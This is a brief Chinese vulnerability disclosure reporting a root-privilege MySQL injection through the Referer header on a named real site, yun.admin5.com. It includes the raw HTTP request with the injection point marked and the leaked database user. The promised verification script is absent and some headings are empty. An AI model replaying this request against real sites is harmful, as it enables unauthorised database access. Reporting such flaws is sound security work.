A5站长网某站点MySQL注射(root权限,附验证脚本)
注入点:
GET / HTTP/1.1 Referer: aaa* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 X-Requested-With: XMLHttpRequest Cookie: PHPSESSID=2oe34dibm17etfkjn5nqhn2nn1 Host: yun.admin5.com Connection: Keep-alive Accept-Encoding: gzip,deflate Accept: */*
Referer可注入。
MySQL user():
python脚本:
修复方案:
过滤,转义
root@localhost

|